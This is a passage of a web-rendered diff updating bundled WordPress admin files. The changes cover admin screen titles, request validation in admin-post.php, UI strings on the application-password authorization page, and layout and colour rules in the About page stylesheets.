 	do_action( "wp_ajax_nopriv_{$action}" );
203 203 
 }
204 
+
204 205 
 // Default status.
205 206 
 wp_die( '0' );

+ 21 - 5
app/wp-admin/admin-header.php
Ver Arquivo 

@@ -18,13 +18,14 @@ if ( ! defined( 'WP_ADMIN' ) ) {
18 18 
  * @global string    $hook_suffix
19 19 
  * @global WP_Screen $current_screen     WordPress current screen object.
20 20 
  * @global WP_Locale $wp_locale          WordPress date and time locale object.
21 
- * @global string    $pagenow
21 
+ * @global string    $pagenow            The filename of the current screen.
22 22 
  * @global string    $update_title
23 23 
  * @global int       $total_update_count
24 24 
  * @global string    $parent_file
25 
+ * @global string    $typenow            The post type of the current screen.
25 26 
  */
26 27 
 global $title, $hook_suffix, $current_screen, $wp_locale, $pagenow,
27 
-	$update_title, $total_update_count, $parent_file;
28 
+	$update_title, $total_update_count, $parent_file, $typenow;
28 29
29 30 
 // Catch plugins that include admin-header.php before admin.php completes.
30 31 
 if ( empty( $current_screen ) ) {
 
@@ -48,8 +49,23 @@ if ( $admin_title === $title ) {
48 49 
 	/* translators: Admin screen title. %s: Admin screen name. */
49 50 
 	$admin_title = sprintf( __( '%s &#8212; WordPress' ), $title );
50 51 
 } else {
52 
+	$screen_title = $title;
53 
+
54 
+	if ( 'post' === $current_screen->base && 'add' !== $current_screen->action ) {
55 
+		$post_title = get_the_title();
56 
+		if ( ! empty( $post_title ) ) {
57 
+			$post_type_obj = get_post_type_object( $typenow );
58 
+			$screen_title  = sprintf(
59 
+				/* translators: Editor admin screen title. 1: "Edit item" text for the post type, 2: Post title. */
60 
+				__( '%1$s &#8220;%2$s&#8221;' ),
61 
+				$post_type_obj->labels->edit_item,
62 
+				$post_title
63 
+			);
64 
+		}
65 
+	}
66 
+
51 67 
 	/* translators: Admin screen title. 1: Admin screen name, 2: Network or site name. */
52 
-	$admin_title = sprintf( __( '%1$s &lsaquo; %2$s &#8212; WordPress' ), $title, $admin_title );
68 
+	$admin_title = sprintf( __( '%1$s &lsaquo; %2$s &#8212; WordPress' ), $screen_title, $admin_title );
53 69 
 }
54 70
55 71 
 if ( wp_is_recovery_mode() ) {
 
@@ -81,7 +97,7 @@ wp_enqueue_script( 'svg-painter' );
81 97 
 $admin_body_class = preg_replace( '/[^a-z0-9_-]+/i', '-', $hook_suffix );
82 98 
 ?>
83 99 
 <script type="text/javascript">
84 
-addLoadEvent = function(func){if(typeof jQuery!=='undefined')jQuery(document).ready(func);else if(typeof wpOnload!=='function'){wpOnload=func;}else{var oldonload=wpOnload;wpOnload=function(){oldonload();func();}}};
100 
+addLoadEvent = function(func){if(typeof jQuery!=='undefined')jQuery(function(){func();});else if(typeof wpOnload!=='function'){wpOnload=func;}else{var oldonload=wpOnload;wpOnload=function(){oldonload();func();}}};
85 101 
 var ajaxurl = '<?php echo esc_js( admin_url( 'admin-ajax.php', 'relative' ) ); ?>',
86 102 
 	pagenow = '<?php echo esc_js( $current_screen->id ); ?>',
87 103 
 	typenow = '<?php echo esc_js( $current_screen->post_type ); ?>',
 
@@ -132,7 +148,7 @@ do_action( 'admin_print_scripts' );
132 148 
 /**
133 149 
  * Fires in head section for a specific admin page.
134 150 
  *
135 
- * The dynamic portion of the hook, `$hook_suffix`, refers to the hook suffix
151 
+ * The dynamic portion of the hook name, `$hook_suffix`, refers to the hook suffix
136 152 
  * for the admin page.
137 153 
  *
138 154 
  * @since 2.1.0

+ 16 - 1
app/wp-admin/admin-post.php
Ver Arquivo 

@@ -29,7 +29,12 @@ nocache_headers();
29 29 
 /** This action is documented in wp-admin/admin.php */
30 30 
 do_action( 'admin_init' );
31 31
32 
-$action = empty( $_REQUEST['action'] ) ? '' : $_REQUEST['action'];
32 
+$action = ! empty( $_REQUEST['action'] ) ? $_REQUEST['action'] : '';
33 
+
34 
+// Reject invalid parameters.
35 
+if ( ! is_scalar( $action ) ) {
36 
+	wp_die( '', 400 );
37 
+}
33 38
34 39 
 if ( ! is_user_logged_in() ) {
35 40 
 	if ( empty( $action ) ) {
 
@@ -40,6 +45,11 @@ if ( ! is_user_logged_in() ) {
40 45 
 		 */
41 46 
 		do_action( 'admin_post_nopriv' );
42 47 
 	} else {
48 
+		// If no action is registered, return a Bad Request response.
49 
+		if ( ! has_action( "admin_post_nopriv_{$action}" ) ) {
50 
+			wp_die( '', 400 );
51 
+		}
52 
+
43 53 
 		/**
44 54 
 		 * Fires on a non-authenticated admin post request for the given action.
45 55 
 		 *
 
@@ -59,6 +69,11 @@ if ( ! is_user_logged_in() ) {
59 69 
 		 */
60 70 
 		do_action( 'admin_post' );
61 71 
 	} else {
72 
+		// If no action is registered, return a Bad Request response.
73 
+		if ( ! has_action( "admin_post_{$action}" ) ) {
74 
+			wp_die( '', 400 );
75 
+		}
76 
+
62 77 
 		/**
63 78 
 		 * Fires on an authenticated admin post request for the given action.
64 79 
 		 *

+ 19 - 8
app/wp-admin/admin.php
Ver Arquivo 

@@ -116,16 +116,16 @@ $time_format = __( 'g:i a' );
116 116 
 wp_enqueue_script( 'common' );
117 117
118 118 
 /**
119 
- * $pagenow is set in vars.php
120 
- * $wp_importers is sometimes set in wp-admin/includes/import.php
121 
- * The remaining variables are imported as globals elsewhere, declared as globals here
119 
+ * $pagenow is set in vars.php.
120 
+ * $wp_importers is sometimes set in wp-admin/includes/import.php.
121 
+ * The remaining variables are imported as globals elsewhere, declared as globals here.
122 122 
  *
123 
- * @global string $pagenow
123 
+ * @global string $pagenow      The filename of the current screen.
124 124 
  * @global array  $wp_importers
125 125 
  * @global string $hook_suffix
126 126 
  * @global string $plugin_page
127 
- * @global string $typenow
128 
- * @global string $taxnow
127 
+ * @global string $typenow      The post type of the current screen.
128 
+ * @global string $taxnow       The taxonomy of the current screen.
129 129 
  */
130 130 
 global $pagenow, $wp_importers, $hook_suffix, $plugin_page, $typenow, $taxnow;
131 131 
 
@@ -320,13 +320,24 @@ if ( isset( $plugin_page ) ) {
320 320 
 	 *
321 321 
 	 * The dynamic portion of the hook name, `$importer`, refers to the importer slug.
322 322 
 	 *
323 
+	 * Possible hook names include:
324 
+	 *
325 
+	 *  - `load-importer-blogger`
326 
+	 *  - `load-importer-wpcat2tag`
327 
+	 *  - `load-importer-livejournal`
328 
+	 *  - `load-importer-mt`
329 
+	 *  - `load-importer-rss`
330 
+	 *  - `load-importer-tumblr`
331 
+	 *  - `load-importer-wordpress`
332 
+	 *
323 333 
 	 * @since 3.5.0
324 334 
 	 */
325 335 
 	do_action( "load-importer-{$importer}" ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores
326 336
337 
+	// Used in the HTML title tag.
338 
+	$title        = __( 'Import' );
327 339 
 	$parent_file  = 'tools.php';
328 340 
 	$submenu_file = 'import.php';
329 
-	$title        = __( 'Import' );
330 341
331 342 
 	if ( ! isset( $_GET['noheader'] ) ) {
332 343 
 		require_once ABSPATH . 'wp-admin/admin-header.php';
 
@@ -365,7 +376,7 @@ if ( isset( $plugin_page ) ) {
365 376 
 	 * The load-* hook fires in a number of contexts. This hook is for core screens.
366 377 
 	 *
367 378 
 	 * The dynamic portion of the hook name, `$pagenow`, is a global variable
368 
-	 * referring to the filename of the current page, such as 'admin.php',
379 
+	 * referring to the filename of the current screen, such as 'admin.php',
369 380 
 	 * 'post-new.php' etc. A complete hook for the latter would be
370 381 
 	 * 'load-post-new.php'.
371 382 
 	 *

+ 1 - 1
app/wp-admin/async-upload.php
Ver Arquivo 

@@ -74,7 +74,7 @@ if ( isset( $_REQUEST['attachment_id'] ) && (int) $_REQUEST['attachment_id'] &&
74 74 
 					</span>
75 75 
 					<?php
76 76 
 					if ( current_user_can( 'edit_post', $id ) ) {
77 
-						echo '<a class="edit-attachment" href="' . esc_url( get_edit_post_link( $id ) ) . '" target="_blank">' . _x( 'Edit', 'media item' ) . '</a>';
77 
+						echo '<a class="edit-attachment" href="' . esc_url( get_edit_post_link( $id ) ) . '">' . _x( 'Edit', 'media item' ) . '</a>';
78 78 
 					} else {
79 79 
 						echo '<span class="edit-attachment">' . _x( 'Success', 'media item' ) . '</span>';
80 80 
 					}

+ 27 - 14
app/wp-admin/authorize-application.php
Ver Arquivo 

@@ -62,6 +62,7 @@ if ( isset( $_POST['action'] ) && 'authorize_application_password' === $_POST['a
62 62 
 	}
63 63 
 }
64 64
65 
+// Used in the HTML title tag.
65 66 
 $title = __( 'Authorize Application' );
66 67
67 68 
 $app_name    = ! empty( $_REQUEST['app_name'] ) ? $_REQUEST['app_name'] : '';
 
@@ -90,7 +91,7 @@ if ( is_wp_error( $is_valid ) ) {
90 91
91 92 
 if ( wp_is_site_protected_by_basic_auth( 'front' ) ) {
92 93 
 	wp_die(
93 
-		__( 'Your website appears to use Basic Authentication, which is not currently compatible with Application Passwords.' ),
94 
+		__( 'Your website appears to use Basic Authentication, which is not currently compatible with application passwords.' ),
94 95 
 		__( 'Cannot Authorize Application' ),
95 96 
 		array(
96 97 
 			'response'  => 501,
 
@@ -147,30 +148,42 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
147 148 
 				<?php
148 149 
 				printf(
149 150 
 					/* translators: %s: Application name. */
150 
-					__( 'Would you like to give the application identifying itself as %s access to your account? You should only do this if you trust the app in question.' ),
151 
+					__( 'Would you like to give the application identifying itself as %s access to your account? You should only do this if you trust the application in question.' ),
151 152 
 					'<strong>' . esc_html( $app_name ) . '</strong>'
152 153 
 				);
153 154 
 				?>
154 155 
 			</p>
155 156 
 		<?php else : ?>
156 
-			<p><?php _e( 'Would you like to give this application access to your account? You should only do this if you trust the app in question.' ); ?></p>
157 
+			<p><?php _e( 'Would you like to give this application access to your account? You should only do this if you trust the application in question.' ); ?></p>
157 158 
 		<?php endif; ?>
158 159
159 160 
 		<?php
160 161 
 		if ( is_multisite() ) {
161 162 
 			$blogs       = get_blogs_of_user( $user->ID, true );
162 163 
 			$blogs_count = count( $blogs );
164 
+
163 165 
 			if ( $blogs_count > 1 ) {
164 166 
 				?>
165 167 
 				<p>
166 168 
 					<?php
167 
-					printf(
169 
+					/* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */
170 
+					$message = _n(
171 
+						'This will grant access to <a href="%1$s">the %2$s site in this installation that you have permissions on</a>.',
172 
+						'This will grant access to <a href="%1$s">all %2$s sites in this installation that you have permissions on</a>.',
173 
+						$blogs_count
174 
+					);
175 
+
176 
+					if ( is_super_admin() ) {
168 177 
 						/* translators: 1: URL to my-sites.php, 2: Number of sites the user has. */
169 
-						_n(
170 
-							'This will grant access to <a href="%1$s">the %2$s site in this installation that you have permissions on</a>.',
171 
-							'This will grant access to <a href="%1$s">all %2$s sites in this installation that you have permissions on</a>.',
178 
+						$message = _n(
179 
+							'This will grant access to <a href="%1$s">the %2$s site on the network as you have Super Admin rights</a>.',
180 
+							'This will grant access to <a href="%1$s">all %2$s sites on the network as you have Super Admin rights</a>.',
172 181 
 							$blogs_count
173 
-						),
182 
+						);
183 
+					}
184 
+
185 
+					printf(
186 
+						$message,
174 187 
 						admin_url( 'my-sites.php' ),
175 188 
 						number_format_i18n( $blogs_count )
176 189 
 					);
 
@@ -224,7 +237,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
224 237
225 238 
 				<div class="form-field">
226 239 
 					<label for="app_name"><?php _e( 'New Application Password Name' ); ?></label>
227 
-					<input type="text" id="app_name" name="app_name" value="<?php echo esc_attr( $app_name ); ?>" placeholder="<?php esc_attr_e( 'WordPress App on My Phone' ); ?>" required />
240 
+					<input type="text" id="app_name" name="app_name" value="<?php echo esc_attr( $app_name ); ?>" required />
228 241 
 				</div>
229 242
230 243 
 				<?php
 
@@ -247,7 +260,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
247 260
248 261 
 				<?php
249 262 
 				submit_button(
250 
-					__( 'Yes, I approve of this connection.' ),
263 
+					__( 'Yes, I approve of this connection' ),
251 264 
 					'primary',
252 265 
 					'approve',
253 266 
 					false,
 
@@ -262,7 +275,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
262 275 
 						printf(
263 276 
 							/* translators: %s: The URL the user is being redirected to. */
264 277 
 							__( 'You will be sent to %s' ),
265 
-							'<strong><kbd>' . esc_html(
278 
+							'<strong><code>' . esc_html(
266 279 
 								add_query_arg(
267 280 
 									array(
268 281 
 										'site_url'   => site_url(),
 
@@ -271,7 +284,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
271 284 
 									),
272 285 
 									$success_url
273 286 
 								)
274 
-							) . '</kbd></strong>'
287 
+							) . '</code></strong>'
275 288 
 						);
276 289 
 					} else {
277 290 
 						_e( 'You will be given a password to manually enter into the application in question.' );
 
@@ -281,7 +294,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
281 294
282 295 
 				<?php
283 296 
 				submit_button(
284 
-					__( 'No, I do not approve of this connection.' ),
297 
+					__( 'No, I do not approve of this connection' ),
285 298 
 					'secondary',
286 299 
 					'reject',
287 300 
 					false,
 
@@ -296,7 +309,7 @@ require_once ABSPATH . 'wp-admin/admin-header.php';
296 309 
 						printf(
297 310 
 							/* translators: %s: The URL the user is being redirected to. */
298 311 
 							__( 'You will be sent to %s' ),
299 
-							'<strong><kbd>' . esc_html( $reject_url ) . '</kbd></strong>'
312 
+							'<strong><code>' . esc_html( $reject_url ) . '</code></strong>'
300 313 
 						);
301 314 
 					} else {
302 315 
 						_e( 'You will be returned to the WordPress Dashboard, and no changes will be made.' );

+ 3 - 1
app/wp-admin/comment.php
Ver Arquivo 

@@ -43,7 +43,7 @@ if ( isset( $_REQUEST['c'] ) ) {
43 43 
 	// Prevent actions on a comment associated with a trashed post.
44 44 
 	if ( $comment && 'trash' === get_post_status( $comment->comment_post_ID ) ) {
45 45 
 		wp_die(
46 
-			__( 'You can&#8217;t edit this comment because the associated post is in the Trash. Please restore the post first, then try again.' )
46 
+			__( 'You cannot edit this comment because the associated post is in the Trash. Please restore the post first, then try again.' )
47 47 
 		);
48 48 
 	}
49 49 
 } else {
 
@@ -53,6 +53,7 @@ if ( isset( $_REQUEST['c'] ) ) {
53 53 
 switch ( $action ) {
54 54
55 55 
 	case 'editcomment':
56 
+		// Used in the HTML title tag.
56 57 
 		$title = __( 'Edit Comment' );
57 58
58 59 
 		get_current_screen()->add_help_tab(
 
@@ -96,6 +97,7 @@ switch ( $action ) {
96 97 
 	case 'approve':
97 98 
 	case 'trash':
98 99 
 	case 'spam':
100 
+		// Used in the HTML title tag.
99 101 
 		$title = __( 'Moderate Comment' );
100 102
101 103 
 		if ( ! $comment ) {

+ 8 - 1
app/wp-admin/credits.php
Ver Arquivo 

@@ -10,6 +10,7 @@
10 10 
 require_once __DIR__ . '/admin.php';
11 11 
 require_once __DIR__ . '/includes/credits.php';
12 12
13 
+// Used in the HTML title tag.
13 14 
 $title = __( 'Credits' );
14 15
15 16 
 list( $display_version ) = explode( '-', get_bloginfo( 'version' ) );
 
@@ -28,7 +29,13 @@ $credits = wp_credits();
28 29 
 		</div>
29 30
30 31 
 		<div class="about__header-text">
31 
-			<?php _e( 'WordPress 5.8 was created by a worldwide team of passionate individuals' ); ?>
32 
+			<?php
33 
+			printf(
34 
+				/* translators: %s: Version number. */
35 
+				__( 'WordPress %s was created by a worldwide team of passionate individuals' ),
36 
+				$display_version
37 
+			);
38 
+			?>
32 39 
 		</div>
33 40
34 41 
 		<nav class="about__header-navigation nav-tab-wrapper wp-clearfix" aria-label="<?php esc_attr_e( 'Secondary menu' ); ?>">

+ 152 - 91
app/wp-admin/css/about-rtl.css
Ver Arquivo 

@@ -22,7 +22,7 @@
22 22 
 .about__container {
23 23 
 	/* Section backgrounds */
24 24 
 	--background: transparent;
25 
-	--subtle-background: #def;
25 
+	--subtle-background: #f0f0f0;
26 26
27 27 
 	/* Main text color */
28 28 
 	--text: #000;
 
@@ -30,7 +30,7 @@
30 30
31 31 
 	/* Accent colors: used in header, on special classes. */
32 32 
 	--accent-1: #3858e9; /* Accent background, link color */
33 
-	--accent-2: #2d46ba; /* Header background */
33 
+	--accent-2: #3858e9; /* Header background */
34 34
35 35 
 	/* Navigation colors. */
36 36 
 	--nav-background: #fff;
 
@@ -49,14 +49,14 @@
49 49 
 .credits-php,
50 50 
 .freedoms-php,
51 51 
 .privacy-php {
52 
-	background: #f0f7ff;
52 
+	background: #fff;
53 53 
 }
54 54
55 55 
 .about-php #wpcontent,
56 56 
 .credits-php #wpcontent,
57 57 
 .freedoms-php #wpcontent,
58 58 
 .privacy-php #wpcontent {
59 
-	background: linear-gradient(-180deg, #fff 50%, #f0f7ff 100%);
59 
+	background: #fff;
60 60 
 	padding: 0 24px;
61 61 
 }
62 62 
 
@@ -141,25 +141,19 @@
141 141 
 	margin: 0 0 var(--gap);
142 142 
 }
143 143
144 
-.about__section .column {
144 
+.about__section .column:not(.is-edge-to-edge) {
145 145 
 	padding: var(--gap);
146 146 
 }
147 147
148 
-.about__section + .about__section .column {
149 
-	padding-top: 0;
150 
-}
151 
-
152 148 
 .about__section + .about__section .is-section-header {
153 149 
 	padding-bottom: var(--gap);
154 150 
 }
155 151
156 152 
 .about__section .column[class*="background-color"],
153 
+.about__section:where([class*="background-color"]) .column,
157 154 
 .about__section .column.has-border {
158 155 
 	padding-top: var(--gap);
159 
-}
160 
-
161 
-.about__section .column.is-edge-to-edge {
162 
-	padding: 0;
156 
+	padding-bottom: var(--gap);
163 157 
 }
164 158
165 159 
 .about__section .column p:first-of-type {
 
@@ -215,7 +209,8 @@
215 209 
 }
216 210
217 211 
 .about__section.has-gutters {
218 
-	gap: calc(var(--gap) / 2);
212 
+	gap: var(--gap);
213 
+	margin-bottom: calc(var(--gap) * 2);
219 214 
 }
220 215
221 216 
 .about__section.has-2-columns {
 
@@ -223,11 +218,11 @@
223 218 
 }
224 219
225 220 
 .about__section.has-2-columns.is-wider-right {
226 
-	grid-template-columns: 1fr 2fr;
221 
+	grid-template-columns: 2fr 3fr;
227 222 
 }
228 223
229 224 
 .about__section.has-2-columns.is-wider-left {
230 
-	grid-template-columns: 2fr 1fr;
225 
+	grid-template-columns: 3fr 2fr;
231 226 
 }
232 227
233 228 
 .about__section.has-2-columns .is-section-header {
 
@@ -329,13 +324,24 @@
329 324 
 	.about__section.has-2-columns.is-wider-left,
330 325 
 	.about__section.has-3-columns {
331 326 
 		display: block;
332 
-		padding-bottom: calc(var(--gap) / 2);
327 
+		margin-bottom: calc(var(--gap) / 2);
328 
+	}
329 
+
330 
+	.about__section .column:not(.is-edge-to-edge) {
331 
+		padding-top: var(--gap);
332 
+		padding-bottom: var(--gap);
333 
+	}
334 
+
335 
+	.about__section.has-2-columns.has-gutters.is-wider-right,
336 
+	.about__section.has-2-columns.has-gutters.is-wider-left,
337 
+	.about__section.has-3-columns.has-gutters {
338 
+		margin-bottom: calc(var(--gap) * 2);
333 339 
 	}
334 340
335 341 
 	.about__section.has-2-columns.has-gutters .column,
336 342 
 	.about__section.has-2-columns.has-gutters .column,
337 343 
 	.about__section.has-3-columns.has-gutters .column {
338 
-		margin-bottom: calc(var(--gap) / 2);
344 
+		margin-bottom: var(--gap);
339 345 
 	}
340 346
341 347 
 	.about__section.has-2-columns.has-gutters .column:last-child,
 
@@ -394,21 +400,25 @@
394 400 
 @media screen and (max-width: 600px) {
395 401 
 	.about__section.has-2-columns {
396 402 
 		display: block;
403 
+		margin-bottom: var(--gap);
404 
+	}
405 
+
406 
+	.about__section.has-2-columns:not(.has-gutters) .column:nth-of-type(n) {
407 
+		padding-top: calc(var(--gap) / 2);
397 408 
 		padding-bottom: calc(var(--gap) / 2);
398 409 
 	}
399 410
411 
+	.about__section.has-2-columns.has-gutters {
412 
+		margin-bottom: calc(var(--gap) * 2);
413 
+	}
414 
+
400 415 
 	.about__section.has-2-columns.has-gutters .column {
401 
-		margin-bottom: calc(var(--gap) / 2);
416 
+		margin-bottom: var(--gap);
402 417 
 	}
403 418
404 419 
 	.about__section.has-2-columns.has-gutters .column:last-child {
405 420 
 		margin-bottom: 0;
406 421 
 	}
407 
-
408 
-	.about__section.has-2-columns .column:nth-of-type(n) {
409 
-		padding-top: calc(var(--gap) / 2);
410 
-		padding-bottom: calc(var(--gap) / 2);
411 
-	}
412 422 
 }
413 423
414 424 
 @media screen and (max-width: 480px) {
 
@@ -452,18 +462,18 @@
452 462 
 .about__container h3.is-larger-heading {
453 463 
 	margin-top: 0;
454 464 
 	margin-bottom: 0.5em;
455 
-	font-size: 2em;
456 
-	line-height: 1.2;
465 
+	font-size: 2rem;
457 466 
 	font-weight: 700;
467 
+	line-height: 1.16;
458 468 
 }
459 469
460 470 
 .about__container h3,
461 471 
 .about__container h1.is-smaller-heading,
462 472 
 .about__container h2.is-smaller-heading {
463 473 
 	margin-top: 0;
464 
-	font-size: 1.6em;
465 
-	line-height: 1.3;
466 
-	font-weight: 400;
474 
+	font-size: 1.625rem;
475 
+	font-weight: 700;
476 
+	line-height: 1.4;
467 477 
 }
468 478
469 479 
 .about__container p {
 
@@ -471,6 +481,13 @@
471 481 
 	line-height: inherit;
472 482 
 }
473 483
484 
+.about__container p.is-subheading {
485 
+	margin-top: 0;
486 
+	font-size: 1.5rem;
487 
+	font-weight: 300;
488 
+	line-height: 160%;
489 
+}
490 
+
474 491 
 .about__section a {
475 492 
 	color: var(--accent-1);
476 493 
 	text-decoration: underline;
 
@@ -498,6 +515,10 @@
498 515 
 	margin-right: calc(var(--gap) / 2);
499 516 
 }
500 517
518 
+.about__container li {
519 
+	margin-bottom: 0.75rem;
520 
+}
521 
+
501 522 
 .about__container img {
502 523 
 	margin: 0;
503 524 
 	max-width: 100%;
 
@@ -524,50 +545,14 @@
524 545 
 	margin-left: auto;
525 546 
 }
526 547
527 
-.about__container .about__image-comparison {
528 
-	position: relative;
529 
-	display: inline-block;
530 
-	max-width: 100%;
531 
-}
532 
-
533 
-.about__container .about__image-comparison img {
534 
-	-webkit-user-select: none;
535 
-	user-select: none;
536 
-	width: auto;
537 
-	max-width: none;
538 
-	max-height: 100%;
539 
-}
540 
-
541 
-.about__container .about__image-comparison > img {
542 
-	max-width: 100%;
543 
-}
544 
-
545 
-.about__container .about__image-comparison-resize {
546 
-	position: absolute !important; /* Needed to override inline style on ResizableBox */
547 
-	top: 0;
548 
-	bottom: 0;
549 
-	right: 0;
550 
-	width: 50%;
551 
-	max-width: 100%;
552 
-}
553 
-
554 
-.about__container .about__image-comparison.no-js .about__image-comparison-resize {
555 
-	overflow: hidden;
556 
-	border-left: 2px solid var(--wp-admin-theme-color);
557 
-}
558 
-
559 
-.about__container .about__image-comparison-resize .components-resizable-box__side-handle::before {
560 
-	width: 4px;
561 
-	left: calc(50% - 2px);
562 
-	transition: none;
563 
-	animation: none;
564 
-	opacity: 1;
565 
-}
566 
-
567 548 
 .about__container .about__image + h3 {
568 549 
 	margin-top: 1.5em;
569 550 
 }
570 551
552 
+.about__container .column .about__image {
553 
+	margin-bottom: calc(var(--gap) / 2);
554 
+}
555 
+
571 556 
 .about__container hr {
572 557 
 	margin: 0;
573 558 
 	height: var(--gap);
 
@@ -590,7 +575,8 @@
590 575 
 }
591 576
592 577 
 .about__section {
593 
-	font-size: 1.2em;
578 
+	font-size: 1.125rem;
579 
+	line-height: 1.55;
594 580 
 }
595 581
596 582 
 .about__section.is-feature {
 
@@ -612,26 +598,45 @@
612 598 
 /* 1.3 - Header */
613 599
614 600 
 .about__header {
601 
+	--about-header-image-width: 521px;
602 
+	--about-header-image-height: 504px;
603 
+	--about-header-bg-width: var(--about-header-image-width);
604 
+	--about-header-bg-height: var(--about-header-image-height);
605 
+	--about-header-bg-offset-inline: calc(var(--gap) * -2);
606 
+
607 
+	position: relative;
615 608 
 	margin-bottom: var(--gap);
616 609 
 	padding-top: 0;
617 
-	background-position: center;
618 
-	background-repeat: no-repeat;
619 
-	background-size: cover;
620 
-	background-image: url('../images/about-header-about.svg');
621 
-	background-color: var(--accent-2);
622 
-	color: var(--text-light);
610 
+	background: var(--subtle-background) url('../images/about-header-about.svg?ver=6.0') no-repeat;
611 
+	background-size: var(--about-header-bg-width) var(--about-header-bg-height);
612 
+	background-position: left var(--about-header-bg-offset-inline) center;
623 613 
 }
624 614
625 615 
 .credits-php .about__header {
626 
-	background-image: url('../images/about-header-credits.svg');
616 
+	--about-header-image-width: 477px;
617 
+	--about-header-image-height: 470px;
618 
+	--about-header-bg-offset-inline: calc(var(--gap) * -4);
619 
+
620 
+	background-image: url('../images/about-header-credits.svg?ver=6.0');
621 
+	background-position: left var(--about-header-bg-offset-inline) top var(--gap);
627 622 
 }
628 623
629 624 
 .freedoms-php .about__header {
630 
-	background-image: url('../images/about-header-freedoms.svg');
625 
+	--about-header-image-width: 411px;
626 
+	--about-header-image-height: 498px;
627 
+	--about-header-bg-offset-inline: var(--gap);
628 
+
629 
+	background-image: url('../images/about-header-freedoms.svg?ver=6.0');
630 
+	background-position: left var(--about-header-bg-offset-inline) top calc(var(--gap) * 4);
631 631 
 }
632 632
633 633 
 .privacy-php .about__header {
634 
-	background-image: url('../images/about-header-privacy.svg');
634 
+	--about-header-image-width: 277px;
635 
+	--about-header-image-height: 361px;
636 
+	--about-header-bg-offset-inline: var(--gap);
637 
+
638 
+	background-image: url('../images/about-header-privacy.svg?ver=6.0');
639 
+	background-position: left var(--about-header-bg-offset-inline) top var(--gap);
635 640 
 }
636 641
637 642 
 .about__header-image {
 
@@ -639,27 +644,50 @@
639 644 
 }
640 645
641 646 
 .about__header-title {
642 
-	padding: 2rem 0 0;
643 
-	margin: 0 2rem;
647 
+	box-sizing: border-box;
648 
+	margin: 0 var(--gap) 0 0;
649 
+	padding: 8rem 0 0;
650 
+	padding-left: calc(var(--about-header-bg-width) + var(--about-header-bg-offset-inline) + var(--gap));
651 
+}
652 
+
653 
+.credits-php .about__header-title,
654 
+.privacy-php .about__header-title {
655 
+	padding-top: 6rem;
656 
+}
657 
+
658 
+.freedoms-php .about__header-title {
659 
+	padding-top: 3rem;
644 660 
 }
645 661
646 662 
 .about__header-title h1 {
647 
-	margin: 0 0 0.5rem;
663 
+	margin: 0 0 1rem;
648 664 
 	padding: 0;
649 
-	font-size: 4.5rem;
665 
+	font-size: clamp(3rem, 18.46vw - 8.08rem, 6rem);
650 666 
 	line-height: 1;
651 667 
 	font-weight: 400;
652 668 
 }
653 669
654 670 
 .about__header-text {
655 
-	max-width: 42rem;
656 
-	margin: 0 0 5em;
657 
-	padding: 0 2rem;
658 
-	font-size: 2rem;
671 
+	box-sizing: border-box;
672 
+	margin: 0 0 9rem;
673 
+	padding: 0 2rem 0 0;
674 
+	padding-left: calc(var(--about-header-bg-width) + var(--about-header-bg-offset-inline) + var(--gap));
675 
+	font-size: 1.6rem;
659 676 
 	line-height: 1.15;
660 677 
 }
661 678
679 
+.credits-php .about__header-text,
680 
+.privacy-php .about__header-text {
681 
+	margin-bottom: 7rem;
682 
+}
683 
+
684 
+.freedoms-php .about__header-text {
685 
+	margin-bottom: 6rem;
686 
+}
687 
+
662 688 
 .about__header-navigation {
689 
+	position: relative;
690 
+	z-index: 1;
663 691 
 	display: flex;
664 692 
 	justify-content: center;
665 693 
 	padding-top: 0;
 
@@ -701,9 +729,15 @@
701 729 
 	border-color: var(--nav-current);
702 730 
 }
703 731
704 
-@media screen and (max-width: 960px){
732 
+@media screen and (max-width: 960px) {
733 
+	.about__header {
734 
+		--about-header-bg-width: calc(var(--about-header-image-width) * 0.7);
735 
+		--about-header-bg-height: calc(var(--about-header-image-height) * 0.7);
736 
+		--about-header-bg-offset-inline: calc(var(--gap) * -1);
737 
+	}
738 
+
705 739 
 	.about__header-title h1 {
706 
-		font-size: 4.8em;
740 
+		font-size: clamp(3rem, 18.46vw - 5.08rem, 6rem);
707 741 
 	}
708 742 
 }
709 743 
 
@@ -722,7 +756,12 @@
722 756 
 		margin-left: calc(var(--gap) / 2);
723 757 
 	}
724 758
725 
-	.about__header-text,
759 
+	.about__header-text {
760 
+		margin-top: 0;
761 
+		margin-left: 0;
762 
+		padding-right: calc(var(--gap) / 2);
763 
+	}
764 
+
726 765 
 	.about__header-navigation .nav-tab {
727 766 
 		margin-top: 0;
728 767 
 		margin-left: 0;
 
@@ -731,13 +770,35 @@
731 770 
 	}
732 771 
 }
733 772
773 
+@media screen and (max-width: 600px) {
774 
+	.about__header,
775 
+	.credits-php .about__header,
776 
+	.privacy-php .about__header,
777 
+	.freedoms-php .about__header {
778 
+		background-image: none;
779 
+	}
780 
+
781 
+	.about__header-title,
782 
+	.about__header-text {
783 
+		padding-left: calc(var(--gap) / 2) !important;
784 
+	}
785 
+
786 
+	.about__header-title h1 {
787 
+		font-size: clamp(2rem, 11.43vw - 0.29rem, 4rem);
788 
+	}
789 
+}
790 
+
734 791 
 @media screen and (max-width: 480px) {
735 792 
 	.about__header-title p {
736 793 
 		font-size: 2.4em;
737 794 
 	}
738 795
796 
+	.about__header-title {
797 
+		padding-top: 2rem;
798 
+	}
799 
+
739 800 
 	.about__header-text {
740 
-		margin-bottom: 1em;
801 
+		margin-bottom: 2rem;
741 802 
 	}
742 803
743 804 
 	.about__header-navigation {

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/about-rtl.min.css


+ 152 - 91
app/wp-admin/css/about.css
Ver Arquivo 

@@ -21,7 +21,7 @@
21 21 
 .about__container {
22 22 
 	/* Section backgrounds */
23 23 
 	--background: transparent;
24 
-	--subtle-background: #def;
24 
+	--subtle-background: #f0f0f0;
25 25
26 26 
 	/* Main text color */
27 27 
 	--text: #000;
 
@@ -29,7 +29,7 @@
29 29
30 30 
 	/* Accent colors: used in header, on special classes. */
31 31 
 	--accent-1: #3858e9; /* Accent background, link color */
32 
-	--accent-2: #2d46ba; /* Header background */
32 
+	--accent-2: #3858e9; /* Header background */
33 33
34 34 
